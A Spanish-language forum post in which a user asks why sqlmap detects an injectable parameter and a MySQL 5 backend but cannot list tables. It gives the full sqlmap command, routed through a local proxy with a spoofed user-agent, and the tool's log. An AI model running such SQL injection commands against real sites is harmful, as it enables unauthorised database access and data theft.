|
Título: Sql injection with Sqlmap Publicado por: delorean en 19 Febrero 2011, 19:11 pm Hola,
Con sqlmap haciendo pruebas consigo ver que BD es y confirmar que se puede inyectar tráfico, pero para intentar ver las tablas, el usuario de la BD o cualquier cosa es imposible, solo se puede ver que BD es y confirmar que es inyectable...Puede ser que realmente no sea inyectable ? Pongo el ejemplo: ./sqlmap.py --url="http://www.prueba.com/index.php?id=13&it=90" --user-agent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid)Firefox/3.0.15" --proxy="http://127.0.0.1:8118" -D mysql --tables sqlmap/0.9-dev - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net
[13:08:45] [INFO] resuming injection point 'GET' from session file [13:08:45] [INFO] resuming injection parameter 'it' from session file [13:08:45] [INFO] resuming injection type 'numeric' from session file [13:08:45] [INFO] resuming match ratio '0.844' from session file [13:08:45] [INFO] resuming 0 number of parenthesis from session file [13:08:45] [INFO] resuming back-end DBMS 'mysql 5' from session file [13:08:45] [INFO] testing connection to the target url [13:08:49] [INFO] testing for parenthesis on injectable parameter [13:08:49] [INFO] the back-end DBMS is MySQL web server operating system: Windows 2000 web application technology: PHP 5.2.6, Microsoft IIS 5.0 back-end DBMS: MySQL 5 [13:08:49] [INFO] fetching tables for database 'mysql' [13:08:49] [INFO] fetching number of tables for database 'mysql' [13:08:49] [INFO] read from file '/pentest/database/sqlmap/output/www.prueba.com/session': [13:08:49] [INFO] read from file '/pentest/database/sqlmap/output/www.prueba.com/session': [13:08:49] [INFO] retrieved: [13:08:55] [WARNING] unable to retrieve the number of tables for database 'mysql' [13:08:55] [CRITICAL] unable to retrieve the tables for any database
|